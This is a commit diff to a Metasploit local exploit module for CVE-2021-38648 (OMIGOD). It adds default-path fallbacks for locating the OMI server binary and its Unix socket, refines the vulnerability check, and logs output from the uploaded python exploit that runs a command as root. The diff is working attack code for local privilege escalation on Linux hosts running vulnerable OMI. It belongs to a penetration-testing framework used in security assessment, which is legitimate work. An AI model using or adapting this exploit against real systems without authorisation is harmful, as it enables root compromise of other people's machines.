Fail over to default paths

2024-09-04 20:18:27 +02:00 · 2021-10-28 15:01:12 -04:00 · 2021-10-28 15:01:12 -04:00 · 98528c8ba6
commit 98528c8ba6
parent 9635110050
1 changed files with 23 additions and 8 deletions
--- a/modules/exploits/linux/local/cve_2021_38648_omigod.rb
+++ b/modules/exploits/linux/local/cve_2021_38648_omigod.rb
@ -12,6 +12,9 @@ class MetasploitModule < Msf::Exploit::Local
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

+  DEFAULT_SERVER_BIN_PATH = '/opt/omi/bin/omiserver'.freeze
+  DEFAULT_SOCKET_PATH = '/var/opt/omi/run/omiserver.sock'.freeze
+
  def initialize(info = {})
    super(
      update_info(
@ -78,15 +81,19 @@ class MetasploitModule < Msf::Exploit::Local

  def check
    pid = pidof('omiserver').first
-    return CheckCode::Safe if pid.nil?
+    return CheckCode::Safe('The omiserver process was not found.') if pid.nil?

    omiserver_bin = read_file("/proc/#{pid}/cmdline").split("\x00", 2).first
+    omiserver_bin = DEFAULT_SERVER_BIN_PATH if omiserver_bin.blank? && file?(DEFAULT_SERVER_BIN_PATH)
+    return CheckCode::Unknown('Failed to find the omiserver binary path.') if omiserver_bin.blank?
+
    vprint_status("Found #{omiserver_bin} running in PID: #{pid}")
-    if cmd_exec("#{omiserver_bin} --version") !~ /\sOMI-(\d+(\.\d+){2,3}(-\d+)?)\s/
+    if cmd_exec("#{omiserver_bin} --version") =~ /\sOMI-(\d+(\.\d+){2,3}(-\d+)?)\s/
+      version = Regexp.last_match(1)
+    else
      return CheckCode::Unknown('Failed to identify the version of the omiserver binary.')
    end

-    version = Regexp.last_match(1)
    return CheckCode::Safe("Version #{version} is not affected.") if Rex::Version.new(version) > Rex::Version.new('1.6.8-0')

    CheckCode::Appears("Version #{version} is affected.")
@ -95,6 +102,7 @@ class MetasploitModule < Msf::Exploit::Local
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    write_file path, data
+  ensure
    register_file_for_cleanup(path)
  end

@ -109,11 +117,17 @@ class MetasploitModule < Msf::Exploit::Local
    pid = pidof('omiserver').first
    fail_with(Failure::NotFound, 'The omiserver pid was not found.') if pid.nil?

-    if read_file("/proc/#{pid}/net/unix") !~ %r{\s(/(\S+)server\.sock)$}
-      fail_with(Failure::NotFound, 'The socket path could not be found.')
+    if read_file("/proc/#{pid}/net/unix") =~ %r{\s(/(\S+)server\.sock)$}
+      socket_path = Regexp.last_match(1)
+    else
+      begin
+        socket_path = DEFAULT_SOCKET_PATH if stat(DEFAULT_SOCKET_PATH).socket?
+      rescue StandardError # rubocop:disable Lint/SuppressedException
+      end
    end

-    socket_path = Regexp.last_match(1)
+    fail_with(Failure::NotFound, 'The socket path could not be found.') if socket_path.blank?
+
    vprint_status("Socket path: #{socket_path}")
    socket_path
  end
@ -122,7 +136,7 @@ class MetasploitModule < Msf::Exploit::Local
    python_binary = find_exec_program
    fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary

-    vprint_status("Using '#{python_binary}' to run exploit")
+    vprint_status("Using '#{python_binary}' to run the exploit")
    socket_path = get_socket_path
    path = datastore['WritableDir']
    python_script = rand_text_alphanumeric(5..10) + '.py'
@ -151,6 +165,7 @@ class MetasploitModule < Msf::Exploit::Local
    upload("#{path}/#{python_script}", exploit_data('CVE-2021-38648', 'exploit.py'))
    cmd = "#{python_binary} #{path}/#{python_script} -s '#{socket_path}' '#{root_cmd}'"
    vprint_status("Running #{cmd}")
-    cmd_exec(cmd)
+    output = cmd_exec(cmd)
+    vprint_line(output) unless output.blank?
  end
 end